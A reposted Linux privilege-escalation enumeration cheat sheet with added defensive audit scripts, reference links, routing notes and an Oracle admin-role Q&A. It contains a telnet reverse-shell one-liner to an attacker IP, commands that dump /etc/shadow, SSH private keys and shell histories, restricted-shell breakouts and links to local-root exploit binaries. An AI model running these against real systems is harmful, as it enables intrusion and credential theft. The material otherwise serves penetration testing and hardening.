A note up front: I first saw this article a long time ago, on sites such as Freebuf.com and 91Ri.org. I am putting it here partly as a backup for my own reference, and partly out of laziness: I could not write an article this good myself, so I will repost it and learn from it.
PS: some of the commands in this article may not work on your host, because they may belong to a different Linux distribution or version.
Key points
What (Linux) privilege escalation comes down to:
- Collect: enumeration, more enumeration, and then some more enumeration.
- Process: sort through the data, analyse it, and prioritise.
- Search: know what to search for and where to find the exploit code.
- Adapt: customise the exploit so that it fits. Not every exploit works on every system "out of the box".
- Try: be ready for (a lot of) trial and error.
Operating system
What is the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release      # Debian based
cat /etc/redhat-release   # Red Hat based
What is the kernel version?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz
What can be learnt from the environment variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications and services
What services are running? Which service is running as which user?
ps aux
ps -ef
top
cat /etc/services
Which services are running as root? Of these, which look vulnerable? Double-check them!
ps aux | grep root
ps -ef | grep root
What applications are installed? What versions are they? Which ones are currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
Are any of the service settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null    # readable entries (checks the mode column)
What jobs are scheduled on the host?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
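A check worth running on top of the cron listing above: which jobs that cron runs as root point at something a non-root user can modify, at a path inside a directory a non-root user can write to, or at a file that does not exist yet. The script below is an added example for this page (not part of the original cheat sheet); the crontab and scripts it inspects are a constructed fixture built in a temporary directory, and the function names are assumptions. On a real host point audit_system_crontab at /etc/crontab or at a file in /etc/cron.d.

```sh
# Added example (not from the original cheat sheet). Fixture is constructed.

# world_writable PATH : true when the "other" write bit is set on PATH
world_writable() {
    [ "$(ls -ld "$1" 2>/dev/null | cut -c9)" = w ]
}

# audit_system_crontab FILE
# Parses system-crontab lines (min hour dom mon dow user command ...),
# ignores comments, blank lines and VAR=value assignments, and for every
# job scheduled as root whose command is an absolute path prints one of:
#   WRITABLE path      the script itself is world-writable
#   WRITABLE-DIR path  the script's directory is world-writable (replace/rename)
#   MISSING path       the script does not exist; check who can create it
#   OK path            none of the above
audit_system_crontab() {
    grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' \
            -e '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$1" |
    while read -r min hour dom mon dow user cmd rest; do
        case "$min" in
            @*) user=$hour; cmd=$dom ;;   # @reboot/@daily form has no time fields
        esac
        [ "$user" = root ] || continue
        case "$cmd" in /*) ;; *) continue ;; esac
        if [ ! -e "$cmd" ]; then
            printf 'MISSING %s\n' "$cmd"
        elif world_writable "$cmd"; then
            printf 'WRITABLE %s\n' "$cmd"
        elif world_writable "$(dirname "$cmd")"; then
            printf 'WRITABLE-DIR %s\n' "$cmd"
        else
            printf 'OK %s\n' "$cmd"
        fi
    done
}

# demo_setup
# Builds the constructed fixture in a temporary directory and prints the
# path of the fake crontab. Nothing here touches the real /etc/crontab.
demo_setup() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/open"
    chmod 755 "$d/bin"
    chmod 777 "$d/open"                       # world-writable directory
    for f in bin/safe.sh bin/loose.sh open/backup.sh; do
        printf '#!/bin/sh\necho running %s\n' "$f" > "$d/$f"
    done
    chmod 755 "$d/bin/safe.sh" "$d/open/backup.sh"
    chmod 777 "$d/bin/loose.sh"               # world-writable script
    cat > "$d/crontab" <<EOF
# constructed /etc/crontab for the example
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
17 *   * * *  root  $d/bin/safe.sh
25 6   * * *  root  $d/bin/loose.sh --full
0  3   * * *  root  $d/open/backup.sh
30 1   * * *  bob   $d/bin/loose.sh
@reboot       root  $d/bin/gone.sh
EOF
    printf '%s\n' "$d/crontab"
}

# demo : run the audit against the fixture
demo() {
    audit_system_crontab "$(demo_setup)"
}
```

Running demo prints OK for safe.sh, WRITABLE for loose.sh, WRITABLE-DIR for backup.sh and MISSING for gone.sh; the job owned by bob is skipped because it does not run as root. The check is on mode bits only, so it does not catch a script that is group-writable by a group you happen to be in; extend world_writable with your own group membership if that matters on the host.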
Are there any plaintext usernames and passwords lying around?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'    # Joomla (single quotes so the shell does not expand $password)
Communications and networking
What NIC(s) does the system have? Which network is it connected to?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users and hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
What is cached? IP and/or MAC addresses?
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic.
# tcpdump 'tcp and dst host [ip] and dst port [port]'
tcpdump 'tcp and ((dst host 192.168.1.7 and dst port 80) or (dst host 10.2.2.222 and dst port 21))'
How can you get a shell? How do you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (commands)
nc -lvp 4445    # Attacker. Output (results)
telnet [attackers ip] 4444 | /bin/sh | telnet [attackers ip] 4445    # On the target system. Use the attacker's IP!
Is port forwarding possible? (port redirection)
# rinetd
http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 [user]@[ip]    # Local port
ssh -R 8080:127.0.0.1:80 [user]@[ip]    # Remote port
# mknod
# mknod backpipe p; nc -l -p [remote port] < backpipe | nc [local IP] [local port] > backpipe
mknod backpipe p; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 > backpipe    # Port relay
mknod backpipe p; nc -l -p 8080 < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow > backpipe    # Proxy (port 80 to 8080); both directions are logged to inflow/outflow. Append & to keep it running in the background.
Is tunnelling possible? Send commands locally, remotely.
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
Confidential information and users
Who are you? Who is logged in? Who has been logged in? Who else is here? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'    # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd    # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directories? If you have permission to access them.
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords:
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user been doing? Are there any passwords in there? Have they edited anything?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
File systems
Which configuration files in /etc/ can be written to? Can you reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null       # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null        # Other
find /etc/ -readable -type f 2>/dev/null               # Readable by the current user
find /etc/ -maxdepth 1 -readable -type f 2>/dev/null   # Readable by the current user (top level only)
What can be found in /var/?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
Any settings or files (hidden) on the website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
What is in the log files? (Could help with "Local File Include" attacks.)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog      # binary; read with the faillog command
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog      # binary; read with the lastlog command
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp         # binary; read with last -f /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp         # binary; read with who
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp (which files are there? logs, system boot records, ...)
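The same log files read from the defender's side. This is an added example for this page (not from the original cheat sheet): it pulls failed and accepted SSH logins and sudo-to-root commands out of a constructed auth.log excerpt, and flags a source that failed repeatedly and then got in. The sample lines and the function names are assumptions for the example; on a real host pipe /var/log/auth.log (Debian) or /var/log/secure (Red Hat) into the functions.

```sh
# Added example (not from the original cheat sheet). Sample log is constructed.
SAMPLE_AUTH_LOG='Mar 10 08:01:12 web1 sshd[2110]: Failed password for invalid user admin from 203.0.113.5 port 51122 ssh2
Mar 10 08:01:15 web1 sshd[2112]: Failed password for root from 203.0.113.5 port 51130 ssh2
Mar 10 08:01:20 web1 sshd[2115]: Failed password for root from 203.0.113.5 port 51140 ssh2
Mar 10 08:02:01 web1 sshd[2130]: Accepted publickey for deploy from 198.51.100.7 port 40022 ssh2: RSA SHA256:N7Q3...
Mar 10 08:05:44 web1 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/bash
Mar 10 08:06:00 web1 sshd[2140]: Accepted password for root from 203.0.113.5 port 51200 ssh2
Mar 10 08:06:30 web1 sshd[2140]: pam_unix(sshd:session): session opened for user root by (uid=0)'

# failed_by_source : "<count> <ip>" per source with failed sshd logins, busiest first
failed_by_source() {
    awk '/sshd\[[0-9]+\]: Failed password/ {
             for (i = 1; i <= NF; i++) if ($i == "from") src = $(i + 1)
             n[src]++
         }
         END { for (s in n) print n[s], s }' | sort -rn
}

# accepted_logins : "<user> <ip> <method>" for every successful sshd login
accepted_logins() {
    awk '/sshd\[[0-9]+\]: Accepted/ {
             for (i = 1; i <= NF; i++) {
                 if ($i == "Accepted") method = $(i + 1)
                 if ($i == "for")      user   = $(i + 1)
                 if ($i == "from")     src    = $(i + 1)
             }
             print user, src, method
         }'
}

# suspicious_sources THRESHOLD : sources with at least THRESHOLD failures that
# also got an Accepted login, printed as "<ip> <failed> <accepted>"
suspicious_sources() {
    awk -v thr="$1" '
        /sshd\[[0-9]+\]: (Failed|Accepted) (password|publickey)/ {
            for (i = 1; i <= NF; i++) if ($i == "from") src = $(i + 1)
            if ($0 ~ /Failed/) failed[src]++; else accepted[src]++
        }
        END {
            for (s in accepted)
                if (failed[s] + 0 >= thr) print s, failed[s] + 0, accepted[s]
        }'
}

# sudo_to_root : "<user> <command>" for every sudo invocation that ran as root
sudo_to_root() {
    awk '/ sudo: / && /USER=root/ {
             user = $6
             sub(/.*COMMAND=/, "")
             print user, $0
         }'
}

# demo : the one query that matters most, run against the sample
demo() {
    printf '%s\n' "$SAMPLE_AUTH_LOG" | suspicious_sources 3
}
```

On the sample, demo prints `203.0.113.5 3 1`: three failures followed by an accepted password login for root from the same address, which is the pattern to chase before anything else in the file. The awk field walking is deliberate; sshd messages vary ("Failed password for invalid user X" versus "Failed password for X"), so anchoring on the literal words "for" and "from" is more robust than fixed column numbers.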
If commands are limited, how do you break out of the restricted shell?
python -c 'import pty;pty.spawn("/bin/bash")'
os.system('/bin/bash')    # from inside an interactive Python prompt
/bin/sh -i
How are the file systems mounted?
mount
df -h
Are there any unmounted file systems?
cat /etc/fstab
What "advanced" Linux file permissions are used? Sticky bits, SUID and SGID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null     # SGID (chmod 2000) - runs as the group, not the user who started it
find / -perm -u=s -type f 2>/dev/null     # SUID (chmod 4000) - runs as the owner, not the user who started it
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in "common" places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)
# Find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
Where can you write to and execute from? A few "common" places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null          # folders writable by the current user
find / -perm -222 -type d 2>/dev/null         # folders writable by owner, group and others
find / -perm -o+w -type d 2>/dev/null         # world-writable folders
find / -perm -o+x -type d 2>/dev/null         # world-executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null    # world-writable and executable folders
# Any "problem" files? Writable files, files with no owner
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null    # world-writable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print 2>/dev/null    # files with no owner or no group
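The awk patterns in the /etc/ section and the find -perm searches above each test one bit at a time. As an added example (not part of the original cheat sheet), the functions below decode all of them from the mode column of an ls -l line, so the output of a `find ... -exec ls -ld {} \;` run can be triaged in one pass; an upper-case S or T in the mode string (bit set without the execute bit) is also worth noticing and comes out of the same check. The listing they run on is constructed and the function names are assumptions.

```sh
# Added example (not from the original cheat sheet). Listing is constructed.

# classify_mode MODESTRING
# Prints the flags encoded in an ls -l mode string such as -rwsr-xr-x:
#   suid           : 's'/'S' in the owner execute slot  (column 4)
#   sgid           : 's'/'S' in the group execute slot  (column 7)
#   sticky         : 't'/'T' in the other execute slot  (column 10)
#   world-writable : 'w'     in the other write slot    (column 9)
# Prints an empty line when none of the four applies.
classify_mode() {
    mode=$1
    flags=""
    case "$(printf '%s' "$mode" | cut -c4)"  in s|S) flags="$flags suid" ;; esac
    case "$(printf '%s' "$mode" | cut -c7)"  in s|S) flags="$flags sgid" ;; esac
    case "$(printf '%s' "$mode" | cut -c10)" in t|T) flags="$flags sticky" ;; esac
    case "$(printf '%s' "$mode" | cut -c9)"  in w)   flags="$flags world-writable" ;; esac
    printf '%s\n' "${flags# }"
}

# audit_listing
# Reads ls -l style lines on stdin (mode in the first field, path in the
# last) and prints "path: flags" for every entry that has at least one flag.
audit_listing() {
    while read -r line; do
        [ -n "$line" ] || continue
        mode=${line%% *}
        path=${line##* }
        flags=$(classify_mode "$mode")
        if [ -n "$flags" ]; then
            printf '%s: %s\n' "$path" "$flags"
        fi
    done
}

# Constructed listing: not taken from any real host.
SAMPLE_LISTING='-rwsr-xr-x 1 root root 44664 /usr/bin/passwd
-rwxr-xr-x 1 root root 1183448 /usr/bin/bash
-rwsr-sr-x 1 root root 12345 /usr/local/bin/backup
drwxrwxrwt 2 root root 4096 /tmp
-rwxrwxrwx 1 root root 200 /opt/app/run.sh
-rwSr--r-- 1 root root 200 /opt/app/odd'

# demo_audit : run the triage over the constructed listing
demo_audit() {
    printf '%s\n' "$SAMPLE_LISTING" | audit_listing
}
```

On a live host the input comes from find, for example `find / \( -perm -4000 -o -perm -2000 -o -perm -0002 \) ! -type l -exec ls -ld {} \; 2>/dev/null | audit_listing`. Of the six sample lines, /usr/bin/bash produces nothing and /opt/app/odd shows up as suid even though its owner execute bit is off, which is exactly the kind of oddity a plain `-perm -u=s` search would list without comment.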
Preparation and finding exploit code
What development tools/languages are installed/supported?
find / -name 'perl*'
find / -name 'python*'
find / -name 'gcc*'
find / -name cc
How can files be uploaded?
find / -name wget
find / -name 'nc*'
find / -name 'netcat*'
find / -name 'tftp*'
find / -name ftp
Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
Finding more information about the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]
http://www.91ri.org/
(Quick) "common" exploits: pre-compiled binary files, use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
Finding the information above hard work?
Go and try a third-party script/tool!
Is the system fully patched? Kernel, operating system, all applications, plugins and web services
apt-get update && apt-get upgrade
yum update
Are services running with the minimum privileges required?
For example, do you need to run MySQL as root?
Can automated scripts be found on the following sites?!
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
(Quick) guides and links
Examples
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm
Others
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html
24 comments on "Some methods for collecting sensitive information after Linux privilege escalation"
Three different ways of escalating privileges on Linux, hands-on
http://bobao.360.cn/learning/detail/2984.html
http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/
https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
https://jivoi.github.io/2015/08/21/pentest-tips-and-tricks-number-2/
Local Linux Enumeration & Privilege Escalation Cheatsheet
https://www.rebootuser.com/?p=1623
Linux intrusion discovery cheat sheet
https://jordanpotti.com/wp-content/uploads/2017/01/linux-cheat-sheet.pdf
Log review cheat sheet
https://jordanpotti.com/wp-content/uploads/2017/01/Log_Review.pdf
A summary of the Linux privilege escalation techniques that appeared in 2016
https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562
Linux privilege escalation: from beginner to giving up
http://www.freebuf.com/articles/system/129549.html
MimiPenguin: a tool for dumping plaintext credentials from memory on Linux systems
https://github.com/huntergregal/mimipenguin
Linux Post Exploitation Command List
https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
MITRE created a project called ATT&CK (covered in an earlier post) that catalogues the techniques and tactics attackers and intruders commonly use. After seeing that project, researchers from the Veramine team created a project of their own to summarise and discuss how to detect and defend against the attack techniques covered in ATT&CK.
https://attack.mitre.org/wiki/Main_Page
https://github.com/veramine/Detections/wiki
Huge Dirty COW(CVE-2017-1000405)
http://ne2der.com/2017/HugeDirtyCOW-CVE-2017%E2%80%931000405/
https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0
https://github.com/bindecy/HugeDirtyCowPOC
Linux privilege escalation: abusing SUID executables
https://www.anquanke.com/post/id/86979
https://pentestlab.blog/2017/09/25/suid-executables/
`
SUID (Set User ID) is a permission that can be set on a file; it shows up in the execute position of the file owner's permission bits. When a file with this permission is executed, the caller temporarily gains the privileges of the file's owner. Why would this permission be set on Linux binaries at all? There are many reasons. For example, the ping program needs root privileges to open a network socket, but the users who run it to check connectivity to other hosts are usually ordinary users.
However, if certain existing binaries and utilities carry the SUID permission, they can be used to escalate privileges to root when executed. Well-known Linux executables that can be used for privilege escalation include:
Nmap
Vim
find
Bash
More
Less
Nano
cp
`
Trick: using Nmap for ARP scans without root privileges
https://twitter.com/i/web/status/987002523872612352
otseca: an open-source Linux security auditing tool that searches and exports system configuration
https://github.com/trimstray/otseca
Penetration testing cheat sheet
https://github.com/kmkz/Pentesting/blob/master/Pentest-cheat-sheet
Case analysis: a compromised Linux host with a hidden mining process
https://mp.weixin.qq.com/s/1AF5cgo_hJ096LmX7ZHitA
Lin.security: a virtual machine for practising Linux privilege escalation
https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/
A collection of articles on privilege escalation and exploitation across multiple platforms
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
Linux Privilege Escalation Using PATH Variable
https://movaxbx.ru/2018/06/01/linux-privilege-escalation-using-path-variable/
Linux Privilege Escalation
https://movaxbx.ru/2018/09/19/linux-privilege-escalation/
`
Kernel exploits
Programs running as root
Installed software
Weak/reused/plaintext passwords
Inside service
SUID misconfiguration
Abusing sudo rights
World-writable scripts invoked by root
Bad PATH configuration
Cron jobs
Unmounted filesystems
`
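Of the items in that list, a bad PATH configuration is the one that is quickest to check and easiest to misjudge, so here is an added example for this page (not from the linked article). audit_path grades each entry of a PATH value; demo_path_hijack builds a constructed fixture in a temporary directory to show why a world-writable directory early in PATH matters, by running a script that calls a command by its bare name. Function names and fixture paths are assumptions.

```sh
# Added example (not from the linked article). Fixture is constructed.

# audit_path PATHVALUE
# Prints "<position> <verdict> [<entry>]" for each colon-separated entry:
#   EMPTY           empty entry ("::" or a leading/trailing ":"), i.e. the cwd
#   RELATIVE        not absolute, resolved against whatever the cwd is
#   MISSING         directory does not exist (can an unprivileged user create it?)
#   WORLD-WRITABLE  anyone can drop a same-named program there
#   OK              absolute, present, not world-writable
# Anything flagged that sorts before /usr/bin and /bin can shadow system
# commands for every script that inherits this PATH.
audit_path() {
    value=$1
    case "$value" in *:) trailing=1 ;; *) trailing=0 ;; esac
    old_ifs=$IFS
    IFS=:
    set -f                      # no globbing while splitting on ':'
    set -- $value
    set +f
    IFS=$old_ifs
    pos=0
    for entry in "$@"; do
        pos=$((pos + 1))
        if [ -z "$entry" ]; then
            printf '%d EMPTY\n' "$pos"
        elif [ "${entry#/}" = "$entry" ]; then
            printf '%d RELATIVE %s\n' "$pos" "$entry"
        elif [ ! -d "$entry" ]; then
            printf '%d MISSING %s\n' "$pos" "$entry"
        elif [ "$(ls -ld "$entry" | cut -c9)" = w ]; then
            printf '%d WORLD-WRITABLE %s\n' "$pos" "$entry"
        else
            printf '%d OK %s\n' "$pos" "$entry"
        fi
    done
    # shells drop a trailing empty field when splitting, so report it by hand
    if [ "$trailing" -eq 1 ]; then
        pos=$((pos + 1))
        printf '%d EMPTY\n' "$pos"
    fi
}

# demo_path_hijack
# Constructed fixture: a script meant to be run by a privileged user calls
# whoami by bare name; its PATH starts with a world-writable directory in
# which a low-privilege user has dropped a program of the same name.
# Prints whatever the script ended up running.
demo_path_hijack() {
    d=$(mktemp -d)
    mkdir -p "$d/open" "$d/bin"
    chmod 777 "$d/open"
    printf '#!/bin/sh\nwhoami\n' > "$d/bin/report.sh"       # the victim
    chmod 755 "$d/bin/report.sh"
    printf '#!/bin/sh\necho hijacked\n' > "$d/open/whoami"  # the planted binary
    chmod 755 "$d/open/whoami"
    PATH="$d/open:/usr/bin:/bin" "$d/bin/report.sh"
}
```

demo_path_hijack prints `hijacked` instead of a user name. Running `audit_path "$PATH"` in your own shell is the first thing to do; the second is to run it with the PATH that root's cron jobs and sudo actually use, which on Debian-style systems is the value set in /etc/crontab and by sudo's secure_path, not the interactive one.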
Linux privilege escalation via trusted $PATH in keybase-redirector
https://hackerone.com/reports/426944
Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials
https://shenaniganslabs.io/2019/05/21/LXD-LPE.html
https://paper.tuisec.win/detail/752f8fa515866c0
https://github.com/initstring/lxd_root
https://github.com/lxc/lxd/issues/2003
https://reboare.github.io/lxd/lxd-escape.html
How do you view the current routing table on Linux (linux check route table)?
https://linuxcommando.blogspot.com/2008/05/how-to-display-routing-table.html
`
# route -n
# ip route
# netstat -rn
`
https://howto.lintel.in/how-to-check-routes-routing-table-in-linux/
https://www.rootusers.com/how-to-display-routing-table-in-linux/
How to add and delete routes on Linux
`
# SIOCADDRT: Invalid argument
route add -net 172.18.0.0 netmask 255.255.0.0 gw 0.0.0.0 dev docker0
# add (works)
route add -net 172.18.0.0 netmask 255.255.0.0 dev docker0
# delete (works)
route del -net 172.18.0.0 netmask 255.255.0.0 dev docker0
`
How to add temporary and permanent routes on Linux
https://blog.csdn.net/sinat_31500569/article/details/70149241
SIOCADDRT error when adding a route to the routing table
https://blog.csdn.net/weixin_40981751/article/details/108229933
SYS, SYSDBA, SYSOPER, SYSTEM
https://asktom.oracle.com/pls/apex/f?p=100:11:0::::P11_QUESTION_ID:2659418700346202574
`
You Asked:
Hi I am very new to oracle.
I have installed Oracle 10g compatible with windows vista.
I am confused with what are exactly, SYS, SYSDBA, SYSOPER and SYSTEM?
How they differ and what is the specific purpose of these automatically created accounts when a new database installation is done?
Please provide me detailed information or please provide me some useful links to read about it in detail.
SYS/SYSTEM are schemas; normally you never use them at all, and you can forget that they exist.
sysdba is a role; think of it as root on Linux or Administrator on Windows, i.e. the highest privilege in the database. It is generally used for upgrades or patching and is not needed day to day.
sysoper is another role, with the privilege to start and stop the database.
and Tom said:
sys and system are “real schemas”, there is a user SYS and a user SYSTEM.
In general, unless the documentation tells you, you will NEVER LOG IN as sys or system, they are our internal data dictionary accounts and not for your use. You will be best served by forgetting they exist.
sysdba and sysoper are ROLES – they are not users, not schemas. The SYSDBA role is like “root” on unix or “Administrator” on Windows. It sees all, can do all. Internally, if you connect as sysdba, your schema name will appear to be SYS.
In real life, you hardly EVER need sysdba – typically only during an upgrade or patch.
sysoper is another role, if you connect as sysoper, you’ll be in a schema “public” and will only be able to do things granted to public AND start/stop the database. sysoper is something you should use to startup and shutdown. You’ll use sysoper much more often than sysdba.
do not grant sysdba to anyone unless and until you have absolutely verified they have the NEED for sysdba – the same with sysoper.
====================
Addenda: Nov 2017
Thanks for some good additional information from Paul Alsemgeest from Netherlands to bring this content up to date:
In the versions from 12c onwards, you will also find roles SYSDG, SYSBACKUP and SYSKM.
These are somewhat less powerful than sysdba, and meant for special user actions.
SYSDG for using Data Guard, SYSBACKUP for … yes backup actions with RMAN and such, and SYSKM for security handling with TDE (Transparent Data Encryption). If you are very strict, you can use them all. Maybe this is useful if you have multiple DBA teams with separate responsibilities. I have not seen it yet. If you are alone on a small environment, SYSDBA will work where DBA is not enough.
`
7.3.2 SYSDBA and SYSOPER System Privileges
https://docs.oracle.com/database/121/ADMQS/GUID-2033E766-8FE6-4FBA-97E0-2607B083FA2C.htm#ADMQS12004
`
SYSDBA and SYSOPER are administrative privileges required to perform high-level administrative operations such as creating, starting up, shutting down, backing up, or recovering the database. The SYSDBA system privilege is for fully empowered database administrators and the SYSOPER system privilege allows a user to perform basic operational tasks, but without the ability to look at user data.
The SYSDBA and SYSOPER system privileges allow access to a database instance even when the database is not open. Control of these privileges is therefore completely outside of the database itself. This control enables an administrator who is granted one of these privileges to connect to the database instance to start the database.
You can also think of the SYSDBA and SYSOPER privileges as types of connections that enable you to perform certain database operations for which privileges cannot be granted in any other way. For example, if you have the SYSDBA privilege, then you can connect to the database using AS SYSDBA.
The SYS user is automatically granted the SYSDBA privilege upon installation. When you log in as user SYS, you must connect to the database as SYSDBA or SYSOPER. Connecting as a SYSDBA user invokes the SYSDBA privilege; connecting as SYSOPER invokes the SYSOPER privilege. EM Express allows you to log in as user SYS and connect as SYSDBA or SYSOPER.
When you connect with the SYSDBA or SYSOPER privilege, you connect with a default schema, not with the schema that is generally associated with your user name. For SYSDBA this schema is SYS; for SYSOPER the schema is PUBLIC.
`